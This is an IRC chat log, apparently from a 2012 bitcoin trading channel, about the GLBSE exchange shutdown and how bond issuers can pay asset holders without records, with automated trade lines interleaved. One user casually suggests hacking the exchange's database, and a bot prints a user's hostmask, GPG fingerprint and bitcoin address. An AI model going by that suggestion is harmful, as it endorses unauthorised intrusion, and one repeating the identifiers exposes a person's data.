fucked up Oct 22 09:53:15 one comptuer does not see the coin Oct 22 09:53:22 one seems it did Oct 22 09:53:50 not sure what went wrong, used the wallet for oever 1 year and have over 5000 transactions and several hundred address Oct 22 09:53:56 but then lol they dont match Oct 22 09:56:52 ls -la Oct 22 10:06:01 [MPEX] [S.MPOE] 7063 @ 0.00043543 = 3.0754 BTC [+] Oct 22 10:11:58 EskimoBob maybe. Oct 22 10:12:04 nice Oct 22 10:12:07 when i wake up ltc diff will be down Oct 22 10:12:07 tho the same computers can be used to mine. Oct 22 10:12:46 meh i just had the world's worst banana Oct 22 10:12:56 wtf, we get quantum computers can't even grow a decent banana ;/ Oct 22 10:24:27 mircea_popescu: you know that this yellow banana we like so much is going to die out Oct 22 10:31:14 [MPEX] [S.MPOE] 48400 @ 0.00043651 = 21.1271 BTC [+] Oct 22 10:56:20 [MPEX] [S.MPOE] 627 @ 0.00043651 = 0.2737 BTC [+] Oct 22 11:22:02 [MPEX] [S.MPOE] 16708 @ 0.00043728 = 7.3061 BTC [+] Oct 22 11:33:34 EskimoBob so i hear. Oct 22 11:47:30 [MPEX] [S.MPOE] 18750 @ 0.00043789 = 8.2104 BTC [+] Oct 22 12:07:33 [MPEX] [S.DICE] 15326 @ 0.003375 = 51.7253 BTC [-] Oct 22 12:34:39 [MPEX] [S.MPOE] 36800 @ 0.00044289 = 16.2984 BTC [+] Oct 22 12:59:48 [MPEX] [S.MPOE] 1392 @ 0.00043986 = 0.6123 BTC [-] Oct 22 13:25:01 [MPEX] [S.MPOE] 11300 @ 0.0004383 = 4.9528 BTC [-] Oct 22 13:50:35 [MPEX] [O.BTCUSD.P130T] 4 @ 0.16325225 = 0.653 BTC [-] Oct 22 13:51:32 [MPEX] [S.DICE] 20000 @ 0.003375 = 67.5 BTC [-] Oct 22 14:17:04 [MPEX] [S.MPOE] 1471 @ 0.0004383 = 0.6447 BTC [-] Oct 22 14:17:04 [MPEX] [S.MPOE] 32857 @ 0.00044004 = 14.4584 BTC [+] Oct 22 14:42:47 [MPEX] [S.MPOE] 1752 @ 0.00044289 = 0.7759 BTC [+] Oct 22 14:43:05 [MPEX] [S.MPOE] 20138 @ 0.00044289 = 8.9189 BTC [+] Oct 22 14:43:05 [MPEX] [S.MPOE] 6710 @ 0.00044306 = 2.9729 BTC [+] Oct 22 15:07:36 [MPEX] [S.MPOE] 18200 @ 0.00044106 = 8.0273 BTC [-] Oct 22 15:32:51 [MPEX] [S.MPOE] 1772 @ 0.00044106 = 0.7816 BTC [-] Oct 22 15:58:09 [MPEX] [S.MPOE] 27359 @ 0.00043935 = 12.0202 BTC [-] Oct 22 15:58:11 [MPEX] [S.MPOE] 9884 @ 0.00044306 = 4.3792 BTC [+] Oct 22 16:23:35 [MPEX] [S.MPOE] 46800 @ 0.00044214 = 20.6922 BTC [-] Oct 22 16:46:07 this is not me at all but seems some people have btc wallets Oct 22 16:46:09 http://boards.4chan.org/b/res/432138975 Oct 22 16:46:16 nsfw Oct 22 16:46:19 its 4chan Oct 22 16:47:08 might be same fag too, hard to tell Oct 22 16:47:42 not enough tits Oct 22 16:48:25 sup guys Oct 22 16:48:57 has anyone talked with nefario about a timeline for the shutdown of glbse? Oct 22 16:49:12 gigavps: oh thats easy Oct 22 16:49:16 8am: several beers Oct 22 16:49:20 9am: glbse taken down Oct 22 16:49:28 10am: spends user funds to get hookers and blow Oct 22 16:49:41 2pm: why the fuck am I in a ditch, and why does my side hurt, and whats with this bag of ice Oct 22 16:49:43 Diablo-D3 i meant to get the asset holders lists Oct 22 16:49:52 ahh Oct 22 16:49:55 lol Oct 22 16:49:57 thats also easy Oct 22 16:49:58 and coins returned Oct 22 16:49:59 never. Oct 22 16:50:12 i got 100% of my 0.00000000 BTC back Oct 22 16:50:17 lol Oct 22 16:50:18 [MPEX] [S.MPOE] 54841 @ 0.00044121 = 24.1964 BTC [-] Oct 22 16:50:20 :< Oct 22 16:50:24 chmod777 Oct 22 16:50:25 I got 0% of my btc back Oct 22 16:50:39 Mpex it up Oct 22 16:52:14 giga did you get your coins back? Oct 22 16:52:44 i kinda wonder if the "double payment fail" was just a stalling tactict. Oct 22 16:54:47 fail internets Oct 22 17:17:39 [MPEX] [S.MPOE] 4000 @ 0.00044168 = 1.7667 BTC [+] Oct 22 17:43:32 [MPEX] [S.MPOE] 117 @ 0.00044121 = 0.0516 BTC [-] Oct 22 17:43:33 [MPEX] [S.MPOE] 27527 @ 0.00043914 = 12.0882 BTC [-] Oct 22 17:43:34 [MPEX] [S.MPOE] 26100 @ 0.00043896 = 11.4569 BTC [-] Oct 22 17:43:36 [MPEX] [S.MPOE] 2156 @ 0.00043802 = 0.9444 BTC [-] Oct 22 17:47:57 everybody get your popcorn: https://bitcointalk.org/index.php?topic=119782.0 Oct 22 17:56:40 we leaked this days ago Oct 22 17:56:44 he got that link from me Oct 22 17:57:12 who leaked it to mircea though? Oct 22 18:00:41 i did Oct 22 18:02:02 i'm wondering who this Anon commenter is that thought i was shareholder4. seems random. hit me up if you're here Oct 22 18:02:33 hmm unless its one of the 2 people i have on ignore Oct 22 18:10:19 [MPEX] [S.MPOE] 13000 @ 0.00043802 = 5.6943 BTC [-] Oct 22 18:16:23 lol am i on ignore? Oct 22 18:18:34 nope Oct 22 18:19:34 is that you're comment though? Oct 22 18:19:37 i tend to get along with a lot of people Oct 22 18:19:39 no Oct 22 18:19:48 i dont do forums/networks Oct 22 18:19:53 social* networks Oct 22 18:19:58 just irc Oct 22 18:20:59 the btc business community is falling apart Oct 22 18:21:14 i wish i got misattributed the "worst. ceo. evar." quote instead at least Oct 22 18:22:02 worst ceo ever is steve ballmer Oct 22 18:22:20 singlehandedly ruined microsoft Oct 22 18:22:59 pigeons: do you run any businesses? Oct 22 18:23:08 or own any? Oct 22 18:23:31 thestringpuller: just private tech consulting services, no btc Oct 22 18:23:44 more freelancer than a "business" Oct 22 18:24:16 last of the freelance hackers are we? i have respect for that Oct 22 18:24:41 i used to be a freelance hacker. then i needed medical insurance Oct 22 18:24:53 yeah, i hear ya Oct 22 18:25:18 so youve been around awhile? Oct 22 18:25:55 more than some, less than others Oct 22 18:26:22 modest :) Oct 22 18:26:50 the glbse fiasco is driving a wedge between the community Oct 22 18:27:27 really? one one side of the wedge is everyone who got screwed. who is on the other side? Oct 22 18:30:16 well nefario showed his true colors. there are logs of him basically saying he would oppose law enforcement. the second the popo arrive due to rising publicity, he caves to political pressure. Oct 22 18:30:59 yeah i think its more of a betrayal than had it been someone who never had presented that they would fight for the cause Oct 22 18:32:06 so wtf has he been doing the last couple of weeks? Oct 22 18:32:14 jacking off Oct 22 18:32:16 nothing i suppose Oct 22 18:32:17 he's a coward ultimately. no loyalty. loyalty is what will make or break this community. there is a saying in the orient, "loyalty to the end" if you truly believe in your cause you will die for it Oct 22 18:32:18 oh hey BurtW Oct 22 18:32:29 dude Oct 22 18:32:38 what's the point in getting sent to jail for glbse? Oct 22 18:32:43 and then glbse will get taken down anyway Oct 22 18:32:48 it's not the kind of thing you can make a stand on Oct 22 18:32:55 I think he's a weasel and incompetent Oct 22 18:32:57 move glbse to another country Oct 22 18:33:02 but it's stupid to expect him to stand up to law enforcement Oct 22 18:33:07 amd vacate Oct 22 18:33:09 yeah, it's really easy to just pick up and move countries Oct 22 18:33:15 the world is a big place Oct 22 18:33:27 cause you know, you walk up to a consulate and say "yo, I wanna move my illegal bitcoin exchange to your country, gimme a work visa" Oct 22 18:33:32 and they'll be like "yeah totally!" Oct 22 18:33:46 i meant more send the data overseas Oct 22 18:33:54 let someone else run it Oct 22 18:34:02 then you disappear or due the time Oct 22 18:34:12 or under the sea Oct 22 18:34:23 in a sunken ship ;) Oct 22 18:34:35 do the time* Oct 22 18:34:47 isnt that what hazard pay is for? Oct 22 18:34:57 Hey copumpkin Oct 22 18:35:29 burt dub is in the house Oct 22 18:35:34 [MPEX] [S.MPOE] 14400 @ 0.00044168 = 6.3602 BTC [+] Oct 22 18:39:43 gigavps: in the event you don't get asset holder information what will you do? Oct 22 18:40:04 what can i do? Oct 22 18:40:28 if i start a claims process, how will i know who is not lying? Oct 22 18:40:48 if the claims go over 40k units issued, who doesn't get paid? Oct 22 18:41:14 does the contract change? Oct 22 18:41:20 there is a case nefario may decide to not release the db info Oct 22 18:41:43 i wouldnt put it past him at this poibt Oct 22 18:41:45 point* Oct 22 18:41:49 Gigamining's contract is dependent on their being a highest traded price over the last 15 days Oct 22 18:42:29 so it will most likely mean that the contract will no longer be perpetual Oct 22 18:42:41 yeah, i have one too for 7 days Oct 22 18:43:06 this whole things is a mess Oct 22 18:44:05 so if someone can come up with clear answers to these questions, i'm happy to continue Gigamining Oct 22 18:44:24 giga, make sure you talk to your lawyer before you act as a broker Oct 22 18:44:37 that is another reason the contract would need to change Oct 22 18:44:51 because I cannot act as a broker or exchange Oct 22 18:44:56 you are an american, so im not kidding, talk to your lawyer Oct 22 18:45:04 yeah you cant Oct 22 18:45:21 you must have talked to a lawyer :) Oct 22 18:45:24 or you is smart Oct 22 18:45:30 either way it sucks Oct 22 18:45:35 so most of the profitability of Teramining, which was being able to be the first to have it and flip it, is gone Oct 22 18:46:12 heh mircea hates mining bonds so i doubt mpex is an option Oct 22 18:46:16 it is a mess Oct 22 18:46:36 so now anyone holding Gigamining and wants to upgrade to Teramining has to ask, just how many coins am i going to put in and is it even worth it Oct 22 18:46:55 but they won't know until a new contract is made and agreed upon Oct 22 18:47:20 and there is no point in making a new contract if i can't reliably know who owns what Oct 22 18:47:39 glbse has you by the balls still :( Oct 22 18:48:03 glbse doesn't have me by the balls, they have all of their/my customers by the balss Oct 22 18:48:05 balls Oct 22 18:48:29 glbse had made it so giga is forced to keep all profit, glbse has fucked everyone who trusted glbse Oct 22 18:48:53 that is the most unfortunate part of this whole thing Oct 22 18:48:56 trust is a powerful thing Oct 22 18:49:08 because it makes me look like a scammer in most outcomes Oct 22 18:49:09 anyone who holds giga stock should sue glbse and their owners like theymos Oct 22 18:49:18 at least your customers no its not yohr fault Oct 22 18:49:26 yeah that is why im so pissed at neferio and theymos... Oct 22 18:49:56 thestringpuller i can only hope at this point Oct 22 18:50:19 i have had death threats over my assets Oct 22 18:50:25 i hope giga has not had the same Oct 22 18:50:35 no death threats yet Oct 22 18:50:41 good Oct 22 18:51:25 wait, people don't like goat? Oct 22 18:51:46 yeah Oct 22 18:51:52 i am a giant cock Oct 22 18:51:59 the thing i dont get is why the platform didn't have an email list of the current asset holders for each particular issuer Oct 22 18:52:22 they do Oct 22 18:52:36 oh you just cant access it Oct 22 18:52:40 fuck them then Oct 22 18:52:54 someone should just hack the db Oct 22 18:53:00 pigeons really some people hate me, some people love me, Oct 22 18:54:21 nobody hates Goat Oct 22 18:55:00 lol yes they do Oct 22 18:55:08 matthew hates me with a passion Oct 22 18:55:27 some do :) Oct 22 18:55:32 and now matthew is banished from BTC Oct 22 18:55:39 yeah Oct 22 18:55:41 see what happens when you hate goat Oct 22 18:55:47 :) Oct 22 18:57:03 im off to bed all Oct 22 18:57:04 night Oct 22 18:57:12 see ya Oct 22 18:57:18 peace Oct 22 18:57:26 thestringpuller you have any good answers to my questions? Oct 22 18:57:31 i'm all ears Oct 22 19:00:35 [MPEX] [S.MPOE] 37500 @ 0.00044168 = 16.563 BTC [+] Oct 22 19:00:35 [MPEX] [S.MPOE] 9200 @ 0.00044214 = 4.0677 BTC [+] Oct 22 19:27:17 [MPEX] [S.MPOE] 6400 @ 0.00044221 = 2.8301 BTC [+] Oct 22 19:27:19 [MPEX] [S.MPOE] 4544 @ 0.00043802 = 1.9904 BTC [-] Oct 22 19:27:20 [MPEX] [S.MPOE] 256 @ 0.00043789 = 0.1121 BTC [-] Oct 22 19:53:21 [MPEX] [S.MPOE] 26700 @ 0.00043789 = 11.6917 BTC [-] Oct 22 20:01:19 pigeons> i wish i got misattributed the "worst. ceo. evar." quote instead at least << lol Oct 22 20:01:33 i see nobody has any faith in nefario's future business plans ?! Oct 22 20:02:56 mircea_popescu i glad to see you are in a joking mood today Oct 22 20:03:03 i'm* Oct 22 20:13:00 and yes, gigavps is pretty royally screwed. Oct 22 20:13:17 o, i was just reading the logs. Oct 22 20:15:15 thanks for clarifying that Oct 22 20:15:47 but yes, what are you going to do with teraminign nao. Oct 22 20:16:20 you still around mircea_popescu ? Oct 22 20:16:27 and re thestringpuller : i don't hate miner bonds. i just don't think they're a fit investment for the unsophisticated. Oct 22 20:16:40 they're complicated to evaluate and easy to misconstrue. Oct 22 20:19:30 [MPEX] [S.MPOE] 1094 @ 0.00043789 = 0.4791 BTC [-] Oct 22 20:19:32 [MPEX] [S.MPOE] 14765 @ 0.00043728 = 6.4564 BTC [-] Oct 22 20:19:33 [MPEX] [S.MPOE] 16030 @ 0.00043709 = 7.0066 BTC [-] Oct 22 20:19:34 [MPEX] [S.MPOE] 6711 @ 0.00043707 = 2.9332 BTC [-] Oct 22 20:19:46 dis here Oct 22 20:20:18 have heard from smickles recently mircea_popescu ? Oct 22 20:20:22 ;;seen smickles Oct 22 20:20:23 smickles was last seen in #bitcoin-assets 1 day, 16 hours, 23 minutes, and 40 seconds ago: but it would be nice in a way, rent, phone, internet, car, insurance for this month, that'll be 200 btc by this date please :) Oct 22 20:20:31 mmm something like that, a day or two. Oct 22 20:20:59 yo Oct 22 20:21:02 we never talked daily tho. if you have business Oct 22 20:21:12 lol, was gonna say email him, but i guess saying the name works too Oct 22 20:21:19 :) Oct 22 20:21:47 [MPEX] [S.DICE] 45 @ 0.003375 = 0.1519 BTC [-] Oct 22 20:23:45 next somebody's gonna buy pi shares Oct 22 20:24:10 [MPEX] [S.DICE] 3 @ 0.0034 = 0.0102 BTC [+] Oct 22 20:24:22 [MPEX] [S.DICE] 1 @ 0.0034 BTC [+] Oct 22 20:24:32 [MPEX] [S.DICE] 4 @ 0.0034 = 0.0136 BTC [+] Oct 22 20:24:36 ahahahaha Oct 22 20:24:50 next somebody's gonna buy 3mn shares Oct 22 20:24:52 S.Dice make a recovery? Oct 22 20:25:16 heh, that don' work so good eh ? Oct 22 20:25:21 Doffx sorta bobbing up an' down Oct 22 20:25:42 [MPEX] [S.DICE] 14735 @ 0.0034 = 50.099 BTC [+] Oct 22 20:26:06 If I could sell mine id make 2 btc at .0034 Oct 22 20:26:20 Too bad they were on Glbse Oct 22 20:26:22 why can't you sell the oh Oct 22 20:26:41 If only you had given me a free account. Oct 22 20:26:55 Its clearly your fault. Oct 22 20:26:58 :) Oct 22 20:26:59 lol. clearly. Oct 22 20:27:08 how much did you lose by getting a free account ? Oct 22 20:27:21 Id be like -10 Oct 22 20:27:23 make 2 btc means you had like 300 btc's worth neh ? Oct 22 20:27:29 no, 30 sorry. Oct 22 20:27:47 If I had bought an account id still be about 10 btc down. Oct 22 20:27:53 so, if you spent 20 to get acct and remainder 10 to get s.dice you'd now have 1 acct worth 30 and 10 btc worth of s.dice Oct 22 20:28:04 Unless I had put all my btc in Mpex then id be up 90 or so Oct 22 20:28:34 So basically had I paid 20 btc id still have 70 or so Oct 22 20:28:53 That make sense? Oct 22 20:28:56 sorta. Oct 22 20:28:58 If and Maybe are not investors :) Oct 22 20:29:04 Right Oct 22 20:29:20 if and maybe are the best investors there are Oct 22 20:29:23 There was no way for me to reliably see Glbse would go under like it did. Oct 22 20:29:25 read like yahoo boards or something Oct 22 20:29:31 20 Oct 22 20:29:36 Doffx now that'd be a problem. Oct 22 20:29:46 20:20 hindsight? Oct 22 20:29:48 lol Oct 22 20:29:53 I knew it would go under. Oct 22 20:30:13 Just though it would be easy to transfer Paper shares to a log to retrieve them, but noooo... Oct 22 20:30:20 a, that. Oct 22 20:30:37 yeah, i don't think anyone could have imagined the explosion of fail that was awaiting in store for us there. Oct 22 20:30:57 mircea_popescu, I should have paid the 20 and invested, I cant bo back in time now though so oh well. Oct 22 20:30:59 course, smickles liquidated like a day before. Oct 22 20:31:04 ;) Oct 22 20:31:11 or was it two days ? Oct 22 20:31:25 Whats the update anyhow smickles? Oct 22 20:31:27 it was too damn close either way mircea_popescu Oct 22 20:31:34 What will my 900 SS shares get me. Oct 22 20:31:56 Doffx: with SS? no news, sadly Oct 22 20:32:22 I can't verify that you are a share holder, so it's cruise-controll for now Oct 22 20:32:37 did you see the latest financial report? Oct 22 20:32:40 It seems if I could get a number for my Sdice shares I could potentially get my btc back. Oct 22 20:33:12 No, I haven’t looked yet. Oct 22 20:33:19 https://bitcointalk.org/index.php?topic=74216.msg1277243#msg1277243 Oct 22 20:33:35 "look here's all the money we made that you can't touch cause i can't verify your ownership" Oct 22 20:34:20 essentially, but, more apologetically :P Oct 22 20:34:35 :p Oct 22 20:34:53 so what's next on the drama programme ? Oct 22 20:35:06 a suicide ? a wedding ? Oct 22 20:35:10 does that mean we're tounging now? (two :p) Oct 22 20:35:17 a double wedding suicide with cannibalism & incest ? Oct 22 20:35:18 Wow nice I made btc on that. Oct 22 20:35:25 See not all my choices were dumb mircea_popescu Oct 22 20:35:32 I was in two reliable assets Oct 22 20:35:44 Doffx haha i never said they'd be Oct 22 20:35:44 SS, and Sdice. Oct 22 20:35:56 I know, I'm more making light of myself. Oct 22 20:35:58 SS, and DerGestapo Oct 22 20:36:47 Id like to get both shares sold and liquidate all my BTC I need the extra cash for rl crap. Oct 22 20:37:29 i still haven't sold pretty much any btc. Oct 22 20:37:58 Doffx: 900 SS? what would you sell them to me at? Oct 22 20:38:21 Id like to get back .015 if possible. Oct 22 20:38:32 Thats what I bought in at thereabouts Oct 22 20:38:37 can you buy them back ?! Oct 22 20:39:20 mircea_popescu: if i get a contract from him saying that he sells them to me, i see no problem in it Oct 22 20:39:44 how do you know he has any ? Oct 22 20:39:50 i don't mean Doffx , but more in general. Oct 22 20:40:09 oh, well, I'd have to trust the other party Oct 22 20:40:10 I have 900 I actually know that for sure because its been the same for months Oct 22 20:40:26 Sdice Im unsure of Oct 22 20:40:35 they either have to have the shares, or get the shares when they become available Oct 22 20:40:36 Its like 4559 or some number Oct 22 20:42:19 I guess nefario has not contacted any issuers... damn, how is this BS going to take Oct 22 20:42:52 considering that stuff with the dbl payments... Oct 22 20:43:30 Doffx: i think i'd buy at 0.0109 Oct 22 20:44:14 I may take that offer. Oct 22 20:44:38 Doffx: let me draft up a contract for you to review then :) Oct 22 20:45:06 Sounds good. Oct 22 20:47:20 ;;ident Doffx Oct 22 20:47:21 Nick 'Doffx', with hostmask 'Doffx!~doff@173-160-245-174-Washington.hfc.comcastbusiness.net', is not identified. Oct 22 20:47:28 ;;gpg info Doffx Oct 22 20:47:29 User 'Doffx', with keyid DE23494FA64F5DA1, fingerprint 9A9A9D9CA29C8F1FB40AC46DDE23494FA64F5DA1, and bitcoin address 1Q9FavHENPK7sATGm8ebthxG9EhQmaamw2, registered on Sat Apr 21 13:05:42 2012. http://bitcoin-otc.com/viewgpg.php?nick=Doffx . Currently not authenticated. Oct 22 20:48:59 Crud, I didnt leave my PC on. Oct 22 20:49:30 I'm at work smickles it may have to wait until I get home to verify. Oct 22 20:50:00 Doffx: no problem, i was just getting your fingerprint there Oct 22 20:50:01 Obviously you can send me the message and ill open later with my key. Oct 22 20:51:29 [MPEX] [S.MPOE] 3389 @ 0.00043707 = 1.4812 BTC [-] Oct 22 20:51:31 [MPEX] [S.MPOE] 20200 @ 0.00043679 = 8.8232 BTC [-] Oct 22 20:51:32 [MPEX] [S.MPOE] 31195 @ 0.00043663 = 13.6207 BTC [-] Oct 22 21:04:17 smickles you live! Oct 22 21:04:22 it is true and good Oct 22 21:06:32 the MVP is ready smickles :) Oct 22 21:06:50 my operations guy registered the domain and all Oct 22 21:07:15 built the db and mini trading automoton Oct 22 21:08:07 wow nice Oct 22 21:09:04 thestringpuller: is the site live now? Oct 22 21:10:10 smickles, do you plan to move SS to mpex when glbse stuff is sorted out? Oct 22 21:10:24 jurov: probably not Oct 22 21:11:21 SS is winding down and I'm launching an accounting company. Oct 22 21:11:40 I've already sent in the incorporation papers Oct 22 21:12:19 if you end up doing it, i can offer your shareholders special coinbr accounts Oct 22 21:12:44 smickles do you give discounts to btc companies? Oct 22 21:13:03 if so could we retain you for q1 2013 :) Oct 22 21:13:07 discounts for what? Oct 22 21:13:15 accounting lol Oct 22 21:13:18 jurov: that's a good offer, I hope you're extending that to all the glbse issuers Oct 22 21:13:35 i already offered that to all passthrough operators Oct 22 21:14:16 about the others.. doubt they'll get accepted on mpex Oct 22 21:14:22 thestringpuller: I'm sure we can come to a mutually benificial arrangement without the use of marketing ploys :) Oct 22 21:14:32 "it's ON SALE!" Oct 22 21:14:40 LOL Oct 22 21:15:14 smickles to answer your question it should be live within 48 hours to a few people Oct 22 21:15:27 i want it to be invite only Oct 22 21:16:00 What offers jurov? Oct 22 21:16:09 I must have missed a post somewhere about something Oct 22 21:16:42 for example conibr is able to facilitate 1:1 exchange of GSDPT to S.DICE Oct 22 21:16:44 [MPEX] [S.MPOE] 10975 @ 0.00043663 = 4.792 BTC [-] Oct 22 21:16:44 Doffx: should glbse assets move to MPEx, jurov will set up asset holders with coinbr accounts Oct 22 21:16:45 [MPEX] [S.MPOE] 34500 @ 0.0004365 = 15.0593 BTC [-] Oct 22 21:16:46 [MPEX] [S.MPOE] 1713 @ 0.00043641 = 0.7476 BTC [-] Oct 22 21:16:57 i made private offers Oct 22 21:17:14 but everyone is waiting in glbbq Oct 22 21:17:19 *on Oct 22 21:17:36 Ahh, that would be cool. Oct 22 21:17:54 I doubt mepex would allow a lot of them though Oct 22 21:18:02 Mpex too Oct 22 21:30:32 oh, Nefario made an interview with Bitcoin Magazine? Oct 22 21:37:08 BTC-Mining where have you been :p Oct 22 21:41:56 [MPEX] [S.MPOE] 38300 @ 0.00043641 = 16.7145 BTC [-] Oct 22 21:43:20 Around. I just never had the article mentioned Oct 22 21:43:36 I mostly got info from the leaked shareholders meeting Oct 22 21:44:28 I hope asset info is released pretty soon Oct 22 21:44:53 I'm up to 918 Gigamining shares by the way. Oct 22 21:45:16 BTC-Mining that's great, only wish i could confirm that somehow Oct 22 21:45:42 Aye, I'm sure that will be released soon enough Oct 22 21:45:52 have you spoken with nefario? Oct 22 21:46:34 Not yet. I don't really need any more info than what has already been reported by those who did. Oct 22 21:51:30 am i up to date on that issue? some btc has been returned, but no share info? Oct 22 21:51:46 Indeed Oct 22 21:51:52 yup Oct 22 21:51:59 Not completly processed Oct 22 21:52:11 https://bitcointalk.org/index.php?topic=118354 Oct 22 21:52:18 BTC-Mining i'm not sure if you realize this or not, but the perpetual contract can no longer exist Oct 22 21:52:27 the contract will have to change Oct 22 21:52:32 Payment claims. Still many claiming to not have been paid however. Oct 22 21:52:43 if i get the info from glbse Oct 22 21:52:46 gigavps: how so? Oct 22 21:53:05 the buyback clause cannot be executed without glbse Oct 22 21:53:25 no way to know the highest trading price over the last 15 days Oct 22 21:53:49 i guess we could use the mpex etf to come to a price Oct 22 21:53:59 but i don't think anyone would like that price much Oct 22 21:54:15 because it's .05676 per bond right now Oct 22 21:54:39 Simple, you'll probably have to process trades manually. Oct 22 21:54:46 LOL Oct 22 21:54:53 not so simple Oct 22 21:55:00 Assuming you're willing to do that... Oct 22 21:55:02 unless you want me to go to prison Oct 22 21:55:28 gigavps: wouldn't you be fine running it privately? Oct 22 21:56:07 smickles my lawyer is researching what, if anything, can be done Oct 22 21:56:26 seems everyone things mining bonds are actually perpetual Oct 22 21:56:27 gigavps: good to hear Oct 22 21:56:48 except for that pesky buy back clause that everyone chooses to ignore Oct 22 21:57:19 maybe we should just use the mpex highest traded price Oct 22 21:58:21 that would be reasonable, do any of thes listing contracts mention GLBSE specifically? Oct 22 21:58:50 the contract was on glbse Oct 22 21:59:06 mpex price is considerably lower however because it is not assumed not to upgrade to Teramining. Oct 22 21:59:08 and google cache doesn't have a cache of glbse.com/asset/view/GIGAMINING Oct 22 21:59:28 BTC-Mining fine, i'll double it Oct 22 21:59:36 just saying Oct 22 21:59:49 Wouldnt the twitter feed have the last sale of Gigamining> Oct 22 21:59:55 Or is that poof to Oct 22 22:00:07 my main point is that without a buyback clause that can be executed, the contract would need to be changed Oct 22 22:00:45 Doffx the last trade on glbse does not reflect the actions of glbse Oct 22 22:00:49 how do you chang a contract without total concent tho? Oct 22 22:01:12 i don't expect you had an amendment clause? Oct 22 22:01:17 smickles everyone who wants to get paid will probably need to agree to a new contract Oct 22 22:01:31 we are in uncharted waters here Oct 22 22:02:13 smickles actually : some btc returned twice, some btc not returned. Oct 22 22:02:14 if not uncharted, uncommon Oct 22 22:02:29 Yeah but you should be able to get the ave trade numbers from it since it was a running transaction log Oct 22 22:02:31 mircea_popescu: oh yeah, i forgot about that bit Oct 22 22:02:38 If they still exsist Oct 22 22:02:43 https://twitter.com/glbse Oct 22 22:02:46 it exists Oct 22 22:02:51 Simple, you'll probably have to process trades manually. << this is insanity, seriously. how is he to do trades manually ? Oct 22 22:03:01 but does it reflect the value of gigamining today? Oct 22 22:03:07 actually, while at it, why not ask him to produce water manually. from like, some hydrogen gas. Oct 22 22:03:22 mircea_popescu i only produce methane gas Oct 22 22:03:26 It reflects the value at the time of Glbse closing Oct 22 22:03:37 mircea_popescu: manually, like with individual share transfer contracts Oct 22 22:03:37 Its as close as you will ever get. Oct 22 22:03:40 you didn't answer my question Oct 22 22:03:44 gigavps yes, methane gas, BUT NOT MANUALLY Oct 22 22:04:19 https://twitter.com/glbse << speaking of this, someone should make a copy. iirc you can delete tweets. Oct 22 22:04:39 mircea_popescu: and old tweets are disappeared by twitter Oct 22 22:04:47 that too. Oct 22 22:04:52 (unless you pay them for access) Oct 22 22:05:02 mircea_popescu someone on the forums posted the entire trading logs since glbse 2.0 Oct 22 22:05:03 Has anyone logged this channel since it started? Oct 22 22:05:05 He'll have a list of which address holds how many shares. Someone with an address could sign his shares off to another address. Oct 22 22:05:22 BTC-Mining I WOULD BE BREAKING THE LAW Oct 22 22:05:27 cat | grep GLBSE Oct 22 22:05:46 gigavps a ok that's useful. Oct 22 22:05:46 yeah, public trading is a no-go (in 'merica) Oct 22 22:05:52 Doffx i will ask my question again. Does the last traded price on glbse reflect the damage they have caused? Oct 22 22:05:53 Well in your case, yes, being in the US is unfortunate Oct 22 22:06:10 BTC-Mining, smickles : i'm just pointing out it's inhuman to expect someone to do this manually. esp on a high volume asset. Oct 22 22:06:13 they being GLBSE and nefario Oct 22 22:06:24 I said no, but that you could use the entire log to come up with the AVE price at the time of close. Oct 22 22:06:30 How else will you value it? Oct 22 22:06:36 mircea_popescu: heh, yeah, I certainly agree, but there are additional issues too Oct 22 22:06:50 even with no consideration of any law, it's not something you can ask of people any more than you can ask them to build you a house out of dry sand Oct 22 22:07:00 [MPEX] [S.MPOE] 5987 @ 0.00043641 = 2.6128 BTC [-] Oct 22 22:07:02 [MPEX] [S.MPOE] 39700 @ 0.00043612 = 17.314 BTC [-] Oct 22 22:07:02 Your going to have to do something like that eventually regardless if you get the glbse info back Oct 22 22:07:03 [MPEX] [S.MPOE] 513 @ 0.00043563 = 0.2235 BTC [-] Oct 22 22:07:16 Doffx i cannot Oct 22 22:07:36 Doffx: the data is currently unknowable :/ Oct 22 22:07:46 i can probably make something to pay everyone coupon payments once i have the data from glbse Oct 22 22:08:09 I have no doubt you will come up with something fair. Oct 22 22:08:15 the only reason BTC-Mining owns so many gigamining shares was to flip them when they could be traded Oct 22 22:08:18 Some back = better than Nothing Oct 22 22:08:37 Doffx i have logs of tiems i'm on. Oct 22 22:08:55 I log everything you say too. Oct 22 22:09:05 lol logs Oct 22 22:09:29 Doffx one day it will be worth it's weight in bitcoin Oct 22 22:09:40 I'm currently writing a mircea_popescu tell all book from the Logs. Oct 22 22:09:50 Its one page so far. Oct 22 22:09:51 nude pix ? Oct 22 22:09:59 only of -pr Oct 22 22:10:11 Of the girl with a title that says " I told you so" Oct 22 22:10:19 :) Oct 22 22:10:54 lol Oct 22 22:10:55 I bet that nude picks of mircea_popescu would sell better than the girl if priced right. Oct 22 22:11:08 Curiosity I bet, how scary is this dude Oct 22 22:11:24 Hmm, but would it be illegal to merely transfer shares upon request? I'd assume AML would be required for that. Oct 22 22:11:26 sounds like Doffx is going to be bidding Oct 22 22:11:38 .00000001 Oct 22 22:12:10 i'm pretty scary. Oct 22 22:12:35 BTC-Mining glbse has royally effed 1000s of people Oct 22 22:13:24 well... 100s. Oct 22 22:14:01 haha Oct 22 22:14:26 my ego is kinda stonework & masonry. pretty big, but also pretty uninflatable. Oct 22 22:14:36 nice Oct 22 22:14:41 Only channel I logged was btcst that was for Pirate tidbits. Oct 22 22:14:46 I dont bother anymore. Oct 22 22:14:59 logging is hard with irssi Oct 22 22:15:15 there's little difference between assbot and twitter anyway, seeing how it just echos Oct 22 22:17:30 dis here Oct 22 22:23:12 thestringpuller: irssi logs hard? Oct 22 22:23:47 to setup with my tgumbs Oct 22 22:27:53 randall munroe is following bitcoinland, too http://xkcd.com/1124/ Oct 22 22:27:59 I have trouble with my tgumbs too. I just don't understand them Oct 22 22:28:04 he's in thw wot even Oct 22 22:28:37 mircea_popescu: i've seen him on #bitcoin Oct 22 22:28:55 ;;seen #bitcoin rmonroe Oct 22 22:28:55 I have not seen rmonroe. Oct 22 22:29:01 not lately, apparently Oct 22 22:29:11 gribble lies Oct 22 22:29:38 he used to chat there a little, then he idled for months Oct 22 22:29:44 i wonder if he even does that now Oct 22 22:30:03 well, he's idle there Oct 22 22:30:15 i wonder if he checks it anyway Oct 22 22:30:27 [MPEX] [S.MPOE] 10000 @ 0.00043891 = 4.3891 BTC [+] Oct 22 22:30:29 [MPEX] [S.MPOE] 55000 @ 0.00044 = 24.2 BTC [+] Oct 22 22:30:30 [MPEX] [S.MPOE] 44100 @ 0.00044236 = 19.5081 BTC [+] Oct 22 22:30:31 [MPEX] 